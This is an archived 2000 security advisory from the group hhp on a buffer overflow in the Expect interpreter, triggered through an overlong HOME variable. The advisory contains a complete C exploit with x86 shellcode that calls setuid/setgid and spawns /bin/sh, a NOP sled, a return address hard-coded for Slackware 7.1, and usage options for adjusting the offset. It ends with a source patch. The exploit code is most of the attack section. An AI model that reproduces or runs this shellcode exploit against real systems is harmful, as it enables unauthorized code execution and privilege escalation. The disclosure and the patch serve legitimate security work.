hhp's Expect advisory/exploit/patch.

2000-12-19T00:00:00
ID SECURITYVULNS:DOC:1090
Type securityvulns
Reporter Securityvulns
Modified 2000-12-19T00:00:00

Description


hhp adv-17 Sec-Advisory/Exploit/Patch www.hhp-programming.net


Topic: Expect. Versions: 5.31.8 and 5.28.1, maybe others. Date: 12/12/2000 Platforms: Tested on Slackware Linux 7.x, maybe others. Authors: Read credits.


THIS ADVISORY IS BASED UPON SELF TESTING RESULTS. WE DO NOT GARAUNTEE THE IN- FORMATION STATED BELOW WILL BE CORRECT IN ALL SITUATIONS.

1) BACKGROUND

  • Expect. Expect is a program to control interactive applications. These applications interactively prompt and expect a user to enter keystrokes in response. By using Expect, you can write simple scripts to automate these interactions.

2) OVERVIEW

  • It is possible to cause Expect to segfault due to impropper bounds checking. EIP can then be overwritten and the flow of execution changed. It is poss- ible to exploit any script that uses the the Expect program(Scripting lang).

3) SETBACK

  • If an Execpt script is suid/sgid it most likely is not possible to gain the set privleges due to the execution of Expect before any permission changes take effect.

4) REPRODUCTION

  • If an application is suid/sgid and sets the effective UID or GID without cleansing the environment then calls upon Expect or via an Expect script, it is possible to exploit the Expect scripting interpreter.

5) EXPLOIT

--------------------- SNIP ---------------------------------------------------- / hhp-expect_smash.c (12/11/00) * * expect (/usr/bin/expect) buffer overflow. * Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others). * * By: isox * Site: www.hhp-programming.net * Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt /

include <stdio.h>

include <stdlib.h>

define NOP 0x90

define OFFSET 0

define BUFLEN 416

define RET 0xbffff580 / Slackware 7.1 /

define EXPECT "/usr/bin/expect"

char code[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31\xc0\x66\x31" "\xdb\xb0\x2e\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08" "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" "\xdc\xff\xff\xff/bin/sh\x69";

void usage(char *arg) { fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg); fprintf(stderr, "Examples:\n"); fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg); fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg); fprintf(stderr, "\t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytes\n", arg, RET, RET + 429); fprintf(stderr, "\t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytes\n\n", arg, RET, RET - 429); exit(1); }

int main(int argc, char argv[]) { char buf, p; long addressp, address; int offset=OFFSET; int i;

if((argc < 3) || (argc > 4)) usage(argv[0]);

if(argc == 3) { if(!strcmp(argv[2], "up")) { address = RET + atoi(argv[1]); printf("Increasing offset by: %d\n", atoi(argv[1])); printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1])); }

if&#40;!strcmp&#40;argv[2], &quot;down&quot;&#41;&#41; {
  address = RET - atoi&#40;argv[1]&#41;;
  printf&#40;&quot;Decreasing offset by: &#37;d&#92;n&quot;, atoi&#40;argv[1]&#41;&#41;;
  printf&#40;&quot;Decreasing EIP to: 0x&#37;x&#92;n&#92;n&quot;, RET - atoi&#40;argv[1]&#41;&#41;;
}

}

if(argc >= 4) { if(!strcmp(argv[2], "up")) { address = strtoul(argv[3], NULL, 16) + atoi(argv[1]); printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16)); printf("Increasing offset by: %d\n", atoi(argv[1])); printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1]))); } if(!strcmp(argv[2], "down")) { address = strtoul(argv[3], NULL, 16) + atoi(argv[1]); printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16)); printf("Decreasing offset by: %d\n", atoi(argv[1])); printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1]))); } }

if (!(buf = (char *)malloc(BUFLEN))) { printf("Can't allocate memory.\n"); exit(-1); }

p = buf; addressp = (long *) p;

for (i = 0; i < BUFLEN; i+=4) { *(addressp++) = address; }

for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) { buf[i] = NOP; }

p = buf + (BUFLEN - strlen(code) - 4);

for (i = 0; i < strlen(code); i++) *(p++) = code[i];

buf[BUFLEN] = '\0';

setenv("HOME", buf, 1); system(EXPECT); } --------------------- SNAP ----------------------------------------------------

6) SOLUTION

  • Apply this patch made and tested on version 5.31.8. To apply the patch, take this snippet out and name it hhp-expect.patch in the expect-5.31 dir- ectory. Then type... 'patch -p1 < hhp-expect.patch' and finish with a 'make' and a 'make install'

--------------------- SNIP ---------------------------------------------------- --- old/exp_main_sub.c Sun Dec 17 04:01:50 2000 +++ new/exp_main_sub.c Sun Dec 17 04:02:46 2000 @@ -761,14 +761,14 @@ } } if (my_rc) { - char file[200]; + char file[256]; char home; int fd; char getenv(); if ((NULL != (home = getenv("DOTDIR"))) || (NULL != (home = getenv("HOME")))) { - sprintf(file,"%s/.expect.rc",home); + snprintf(file, 256-1, "%s/.expect.rc", home); // Temporary fix. if (-1 != (fd = open(file,0))) { if (TCL_ERROR == (rc = Tcl_EvalFile(interp,file))) { expErrorLog("error executing file: %s\r\n",file);

--------------------- SNAP ----------------------------------------------------

7) CREDITS

  • Ben Lull (isox) (plix@chainsawbeer.com) - Bug finding, exploit, testing.
  • Cody Tubbs (loophole) (pigspigs@yahoo.com) - Advisory, patch, testing.